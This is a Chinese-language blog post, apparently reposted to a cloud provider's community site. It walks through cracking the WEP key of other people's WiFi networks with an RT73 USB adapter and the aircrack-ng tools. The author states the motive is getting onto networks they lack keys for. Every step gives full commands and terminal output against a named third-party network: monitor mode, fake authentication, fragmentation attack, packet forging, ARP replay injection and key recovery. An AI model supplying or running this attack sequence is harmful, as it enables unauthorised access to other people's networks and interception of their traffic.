RT73網卡破解WIFI密碼(WEP)

來源:互聯網
上載者:User

      出於興趣需要,想串連下多個地方的無線WIFI網路,結果都需要密鑰。所以就花了幾天時間照網上的方法破解下試試,終於被俺試出來了,過程如下:

1,我的網卡型號是RT73 USB Wireless LAN Card,以上名稱是在裝置管理員中顯示的完整名字,我在XP下裝了完整的原廠驅動,但在ubuntu裡面是什麼驅動都沒有裝。

2,首先需要瞭解當前環境下目標WIFI網的名字,頻道號。我是用USB引導進入BT3這個工具,進入案頭後,點擊裡面的WIFI assistant工具,就可以顯示當前的網路名稱字和頻道號。記下即可。比如:我記下了當前網路名稱是:Micorlink_SZ,頻道號是11。

3,進入ubuntu,插入無線網卡,保證網卡是正常載入並識別的,正常的話會有一個提示框,顯示載入ralink RT73無線網卡。

4,建立立一個終端運行:ifconfig -a

終端顯示:

wlan0     Link encap:乙太網路  硬體地址 00:0c:43:2a:36:c4 
              BROADCAST MULTICAST  MTU:1500  躍點數:1
              接收資料包:0 錯誤:0 丟棄:0 過載:0 幀數:0
              發送資料包:0 錯誤:0 丟棄:0 過載:0 載波:0
              碰撞:0 發送隊列長度:1000 
              接收位元組:0 (0.0 B)  發送位元組:0 (0.0 B)

參數說明:顯示完整的PC網路設定。

功能:通過此命令可以得到自己的無線網卡的名字和MAC地址,備用。

5,終端運行:airmon-ng start wlan0 11

終端顯示:

Interface   Chipset       Driver

wlan0       Ralink 2573   USB rt73usb - [phy1]     (monitor mode enabled on mon0)

參數說明:wlan0是自己的無線網卡載入名字,11是目標網開放的頻道號。

功能:第一次執行此命令,會提示安裝ai的XX軟體,用apt-get install安裝它要求的軟體即可。此命令是將自己的無線網卡置於monitor 模式,有抓包的功能。運行該命令成功後,會看到無線網卡升級成監控模式後的別名,就是mon0。如果發現弄錯了頻道可以多試幾次。

6,終端運行:airodump-ng --ivs -w name -c 11 mon0

終端顯示:

BSSID                       PWR RXQ  Beacons   #Data, #/s  CH  MB   ENC  CIPHER AUTH      ESSID 

00:1D:73:DE:9C:F5  -55  71    16605       14114   12    11  54 . WEP   WEP                OPN  Microlink_SZ        
00:1D:0F:84:06:8C  -53   0       31             0           0    6     54 . WEP  WEP                  TP-LINK             
00:1D:73:DE:A8:1D  -63  99    17107       62334   11   11  54 .   WEP    WEP               OPN  Microlink_SZ        
                                                                                                         
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                                                          
(not associated)   00:11:F6:88:14:D6  -69    0 - 1      0       61                               
(not associated)   00:1F:3A:97:B1:CE  -71    0 - 1      0       92                               
00:1D:73:DE:9C:F5  00:1F:3B:16:00:CB  -69    1 -12      8     5215  Microlink_SZ                 
00:1D:73:DE:9C:F5  00:1F:3B:A0:C2:1B  -69   54 - 6     18     4707  WXYZ,Microlink_SZ 

參數說明:BSSID是AP的MAC地址;PWR是AP訊號的強度大小,一般低於10就丟包比較嚴重,難破解;RXQ是幹擾的大小;Beacons是發送接收的包,在跳說明有資料;#Data是接收到的可以用來破解的特殊包,如果一直不變說明沒有用戶端串連,比較難破解;CH是頻道號;MB是網路連接速度,54就是54MB;ENC、CIPHER、AUTH是加密方式,顯示WEP的才可以破解;ESSID 是AP的名字,為了阻擋別人破解可以才用中文的名字。

功能:列出無線WIFI網的資訊。這個視窗開著就好了,不用管它。

7,建立一個終端,運行:aireplay-ng -1 0 -e Microlink_SZ -a 001d73dea81d -h 000c432a36c4 mon0

終端顯示:

10:44:54  Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11

10:44:54  Sending Authentication Request (Open System) [ACK]
10:44:54  Authentication successful
10:44:54  Sending Association Request [ACK]
10:44:54  Association successful (AID: 1)

參數說明:Microlink_SZ是AP的名字;001d73dea81d是目標要破解網卡的MAC地址,由第六步可以得到,注意去掉中間的冒號;000c432a36c4是自己網卡的MAC地址,由第四步可以得到,也要去掉冒號;mon0是由第五步得到的監控名字。

功能:這個命令主要是針對#Data增長緩慢的AP,aireplay顧名思義就是重發類比發包的意思,是一條欺騙命令,串連上AP。如果執行成功,那麼會顯示 successful 。

8,終端運行:aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0

終端顯示:

10:54:18  Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:54:18  Waiting for a data packet...
Read 27 packets...

        Size: 88, FromDS: 0, ToDS: 1 (WEP)

          BSSID  =  00:1D:73:DE:A8:1D
          Dest. MAC  =  00:1E:BE:C7:B8:CA
         Source MAC  =  00:1F:3A:52:BD:73

        0x0000:  0841 2c00 001d 73de a81d 001f 3a52 bd73  .A,...s.....:R.s
        0x0010:  001e bec7 b8ca f021 2d42 0000 31f4 7340  .......!-B..1.s@
        0x0020:  b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e  ....A...Q.^.!.J^
        0x0030:  f423 aced ff21 8623 664c 815b f58c f6e7  .#...!.#fL.[....
        0x0040:  8b8c 2b31 4319 2a9e f99c e895 af6a bb13  ..+1C.*......j..
        0x0050:  dd55 d2d7 0eda 68da                      .U....h.

Use this packet ? y

Saving chosen packet in replay_src-0415-105425.cap
10:55:12  Data packet found!
10:55:12  Sending fragmented packet
10:55:12  Got RELAYED packet!!
10:55:12  Trying to get 384 bytes of a keystream
10:55:12  Got RELAYED packet!!
10:55:12  Trying to get 1500 bytes of a keystream
10:55:13  Got RELAYED packet!!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

參數說明:001d73dea81d 是目標破解的AP的MAC地址;000c432a36c4 是自己網卡的MAC地址;mon0是監控別名。

功能:上一條成功後,開始收集#Data的資料,才能夠進行類比破解。如果#Data沒有增加,該命令會一直執行,直到捕獲一個#Data包。之後,程式會問你是否用這個包來類比攻擊,回答Y即可。如果攻擊成功,則會顯示。成功之後會顯示一個檔案名稱:fragment-xxxx-xxxx.xor檔案,這個檔案馬上就會用到,該檔案是儲存在root目錄下(我自己的電腦)。

9,終端運行:packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp

終端顯示:

Wrote packet to: mrarp

參數說明:001d73dea81d 是待破解的MAC地址;000c432a36c4 是自己的MAC地址;fragment-0415-105512.xor就是第八步顯示的檔案名稱;

功能:破解包的準備過程,顯示組建檔案到mrarp。

10,終端運行:aireplay-ng -2 -r mrarp -x 512 mon0

終端顯示:

No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1D:73:DE:A8:1D
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0C:43:2A:36:C4

        0x0000:  0841 0201 001d 73de a81d 000c 432a 36c4  .A....s.....C*6.
        0x0010:  ffff ffff ffff 8001 e4cb 8500 0039 fd12  .............9..
        0x0020:  169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890  ..zj......k...X.
        0x0030:  d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9  ....+.....02$n@.
        0x0040:  a65a 27af                                .Z'.

Use this packet ? y

Saving chosen packet in replay_src-0415-110249.cap
sending package xxxx.

參數說明:mon0是自己的無線網卡監聽裝置別名;512 是攻擊速度,1024是最大值,一般512即可。

功能:這一步開始後,選擇Y會看到sending 的package 數量在增加,同時第一個終端裡面顯示的#Data也在快速增加,只需等待即可。

11,建立終端運行:aircrack-ng -n 64 -b 001d73dea81d name-01.ivs

終端顯示:

Opening name-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40103 ivs.

                                 Aircrack-ng 1.0 rc3

                 [00:00:11] Tested 8 keys (got 40982 IVs)

   KB    depth   byte(vote)
    0    0/  1   36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)
    1    0/  1   39(52472) 83(47580) B2(46496) D0(46448) 29(46312)
    2    0/  1   39(53488) 22(48804) FC(48144) 85(48108) 55(47784)
    3    0/  1   39(54596) A7(48580) 46(48568) 76(48392) 22(47804)
    4    0/  7   04(48432) BD(47996) 04(47680) B9(47524) 17(47376)

                     KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )
 Decrypted correctly: 100%

參數說明:001d73dea81d 是要破解的目標MAC地址;name-01.ivs是之前產生的一個檔案,在root目錄下以name-xx.ivs命名,尋找最大編號的那個。

功能:只要#Data達到10000以上,一會兒就會顯示破解出來的密碼,同時會顯示對應的ASCII碼。如果運氣不好,多等待一下即可。

 

參考文章:http://www.city009.cn/wep-wap-pojie-8.html

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.